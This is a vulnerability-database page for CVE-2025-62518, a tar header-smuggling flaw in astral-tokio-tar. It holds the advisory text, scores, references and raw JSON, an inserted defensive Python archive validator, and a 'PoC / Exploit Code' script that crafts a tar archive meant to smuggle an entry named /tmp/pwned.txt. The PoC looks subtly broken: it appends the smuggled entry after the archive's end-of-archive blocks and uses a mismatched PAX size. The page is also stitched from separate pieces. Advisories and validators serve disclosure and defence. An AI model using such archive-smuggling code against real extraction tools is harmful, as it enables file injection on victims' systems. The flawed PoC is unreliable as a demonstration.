Security Vulnerability Report
CVE-2025-62518 CVSS 8.1 HIGH

CVE-2025-62518

Published: 2025-10-21 17:15:41
Last Modified: 2026-04-15 00:35:42

Description

astral-tokio-tar is a tar archive reading/writing library for async Rust. Versions of astral-tokio-tar prior to 0.5.6 contain a boundary parsing vulnerability that allows attackers to smuggle additional archive entries by exploiting inconsistent PAX/ustar header handling. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. This issue has been patched in version 0.5.6. There are no workarounds.
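The header-size resolution the description refers to, as an added example that is not part of this CVE record or of the astral-tokio-tar project: a small Python tar walker (Python because the page's own PoC is Python) that takes each entry's data length from a PAX `size` record when one precedes the entry, validates every header block, and reports entries where the PAX size and the ustar size disagree. A ustar-only mode shows where the pre-0.5.6 behaviour lands. All function names (`walk`, `size_overrides`, `ustar_only_walk_misaligns`, `names_via_stdlib`, `build_sample`) and the sample archive are this example's own constructions, not identifiers from the library or the advisory.

```python
import io
import tarfile

BLOCK = 512

def _padded(n: int) -> int:  # round a length up to the next 512-byte block
    return (n + BLOCK - 1) // BLOCK * BLOCK

def _octal(field: bytes) -> int:
    """Decode a NUL/space-terminated octal ustar field (empty means 0)."""
    text = field.split(b"\x00", 1)[0].strip()
    return int(text, 8) if text else 0

def _checksum_ok(header: bytes) -> bool:
    """ustar checksum: sum of the block with the checksum field read as spaces."""
    return sum(header[:148]) + 8 * 0x20 + sum(header[156:]) == _octal(header[148:156])

def _pax_records(payload: bytes) -> dict:
    """Parse PAX records of the form '<len> <key>=<value>\\n'."""
    records, pos = {}, 0
    while pos < len(payload):
        space = payload.index(b" ", pos)
        length = int(payload[pos:space])
        key, _, value = payload[space + 1:pos + length].rstrip(b"\n").partition(b"=")
        records[key.decode()] = value.decode()
        pos += length
    return records

def walk(data: bytes, honour_pax: bool = True):
    """Yield (name, ustar_size, effective_size, data_offset) per entry; honour_pax=False
    advances by the ustar size only (the pre-0.5.6 behaviour) and so lands in file data."""
    pos, pending = 0, {}  # pending: records of a PAX 'x' header for the next entry
    while pos + BLOCK <= len(data):
        header = data[pos:pos + BLOCK]
        if header == b"\x00" * BLOCK:  # end-of-archive marker
            break
        if header[257:262] != b"ustar" or not _checksum_ok(header):
            raise ValueError(f"invalid ustar header at offset {pos}")
        name = header[:100].split(b"\x00", 1)[0].decode()
        ustar_size, data_offset = _octal(header[124:136]), pos + BLOCK
        if header[156:157] == b"x":
            pending = _pax_records(data[data_offset:data_offset + ustar_size])
            pos = data_offset + _padded(ustar_size)
            continue
        effective = int(pending["size"]) if honour_pax and "size" in pending else ustar_size
        pending = {}
        yield (name, ustar_size, effective, data_offset)
        pos = data_offset + _padded(effective)

def size_overrides(data: bytes) -> list:
    """Entries whose PAX size differs from the ustar size, the case the bug mishandles."""
    return [(n, u, e) for n, u, e, _ in walk(data) if u != e]

def ustar_only_walk_misaligns(data: bytes) -> bool:
    """True when advancing by the ustar size alone lands on a block that is not a header."""
    try:
        list(walk(data, honour_pax=False))
        return False
    except ValueError:
        return True

def names_via_stdlib(data: bytes) -> list:
    """Cross-check: CPython's tarfile also honours the PAX size override."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return [m.name for m in tar.getmembers()]

# Constructed sample archive (built here for the demonstration, not a real artifact).
def _header(name: str, size: int, typeflag: bytes) -> bytes:
    h = bytearray(BLOCK)
    h[:len(name)] = name.encode()
    h[100:108], h[108:116], h[116:124] = b"0000644\x00", b"0000000\x00", b"0000000\x00"
    h[124:136], h[136:148] = f"{size:011o}\x00".encode(), b"00000000000\x00"
    h[148:156], h[156:157], h[257:263], h[263:265] = b" " * 8, typeflag, b"ustar\x00", b"00"
    h[148:156] = f"{sum(h):06o}\x00 ".encode()  # checksum computed over the space-filled field
    return bytes(h)

def _pad(payload: bytes) -> bytes:
    return payload + b"\x00" * (_padded(len(payload)) - len(payload))

def _pax_record(key: str, value: str) -> bytes:
    body = f" {key}={value}\n"
    length = len(body) + 1
    while len(body) + len(str(length)) != length:  # <len> counts its own digits
        length = len(body) + len(str(length))
    return f"{length}{body}".encode()

def build_sample() -> bytes:
    """A normal entry, then an entry with ustar size 0 whose PAX header says 20 bytes."""
    decoy, inner = b"decoy file contents\n", b"twenty bytes of data"
    pax = _pax_record("size", str(len(inner)))
    return (_header("innocent.txt", len(decoy), b"0") + _pad(decoy)
            + _header("PaxHeaders/data.bin", len(pax), b"x") + _pad(pax)
            + _header("data.bin", 0, b"0") + _pad(inner)
            + b"\x00" * (2 * BLOCK))

SAMPLE = build_sample()
```

For the constructed sample, `walk` yields two entries and `size_overrides` flags `data.bin` (ustar size 0, PAX size 20); the ustar-only walk stops at offset 2560 with a validation error because that block is file data rather than a header. On a real extraction path, the condition `size_overrides` reports is the one to log or reject on when a PAX size override is not expected, and validating every header block before trusting it is what keeps a misaligned reader from accepting content as entries.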

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

astral-tokio-tar < 0.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62518 PoC - Tarmageddon: astral-tokio-tar PAX Header Smuggling
# This PoC demonstrates how to craft a malicious tar archive that exploits
# the inconsistent PAX/ustar header size handling in astral-tokio-tar < 0.5.6

import tarfile
import io
import os


def create_malicious_tar(output_path, smuggled_filename, smuggled_content):
    """
    Create a tar archive that exploits CVE-2025-62518 by smuggling
    an additional archive entry through PAX header size confusion.
    """
    buf = io.BytesIO()

    # First entry: legitimate-looking file with PAX extended header
    # The PAX header specifies a large size, but ustar header has size=0
    pax_info = {"size": str(len(smuggled_content) + 512)}

    with tarfile.open(fileobj=buf, mode='w') as tar:
        # Add a normal file entry
        info = tarfile.TarInfo(name="innocent.txt")
        info.size = len(b"This is a decoy file content.")
        tar.addfile(info, io.BytesIO(b"This is a decoy file content."))

        # Add PAX header entry with manipulated size
        info2 = tarfile.TarInfo(name="exploit.txt")
        info2.size = 0  # ustar header says 0, but PAX will say otherwise
        info2.pax_headers = pax_info
        tar.addfile(info2)

    # Manually craft the malicious tar with embedded smuggled entry
    with open(output_path, 'wb') as f:
        f.write(buf.getvalue())
        # Append the smuggled tar entry (will be misinterpreted as a header)
        smuggled_entry = create_raw_tar_entry(smuggled_filename, smuggled_content)
        f.write(smuggled_entry)

    print(f"Malicious tar created: {output_path}")


def create_raw_tar_entry(filename, content):
    """Create a raw tar entry that will be smuggled via the size confusion."""
    header = bytearray(512)

    # Filename (first 100 bytes)
    fname_bytes = filename.encode('utf-8')
    header[0:len(fname_bytes)] = fname_bytes

    # File mode (bytes 100-107): "0000644\0"
    header[100:108] = b"0000644\x00"

    # UID (bytes 108-115): "0000000\0"
    header[108:116] = b"0000000\x00"

    # GID (bytes 116-123): "0000000\0"
    header[116:124] = b"0000000\x00"

    # File size (bytes 124-135): octal of content length
    size_str = f"{len(content):011o}\x00".encode('ascii')
    header[124:136] = size_str

    # Modification time (bytes 136-147): "00000000000\0"
    header[136:148] = b"00000000000\x00"

    # Checksum placeholder (bytes 148-155): eight spaces for calculation
    header[148:156] = b"        "

    # Type flag (byte 156): '0' = regular file
    header[156] = ord('0')

    # Magic (bytes 257-262): "ustar\0"
    header[257:263] = b"ustar\x00"

    # Version (bytes 263-264): "00"
    header[263:265] = b"00"

    # Calculate checksum
    checksum = sum(header) & 0xFFFFFF
    chk_str = f"{checksum:06o}\x00 ".encode('ascii')
    header[148:156] = chk_str

    # Pad content to 512-byte boundary
    padded_content = content + b'\x00' * ((512 - len(content) % 512) % 512)

    return bytes(header) + padded_content


# Usage example
if __name__ == "__main__":
    # Attempt to smuggle a file to /tmp/pwned.txt
    create_malicious_tar(
        "exploit.tar",
        "/tmp/pwned.txt",
        b"This file was smuggled via CVE-2025-62518!"
    )
```

References

https://edera.dev/stories/tarmageddon
https://github.com/astral-sh/tokio-tar/commit/22b3f884adb7a2adf1d3a8d03469533f5cbc8318
https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-j5gw-2vrg-8fgx
https://github.com/astral-sh/uv/security/advisories/GHSA-w476-p2h3-79g9
https://github.com/edera-dev/cve-tarmageddon

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-62518", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "astral-tokio-tar is a tar archive reading/writing library for async Rust. Versions of astral-tokio-tar prior to 0.5.6 contain a boundary parsing vulnerability that allows attackers to smuggle additional archive entries by exploiting inconsistent PAX/ustar header handling. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. This issue has been patched in version 0.5.6. There are no workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "references": [{"url": "https://edera.dev/stories/tarmageddon", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/tokio-tar/commit/22b3f884adb7a2adf1d3a8d03469533f5cbc8318", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-j5gw-2vrg-8fgx", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/uv/security/advisories/GHSA-w476-p2h3-79g9", "source": "[email protected]"}, {"url": "https://github.com/edera-dev/cve-tarmageddon", "source": "[email protected]"}]}}
```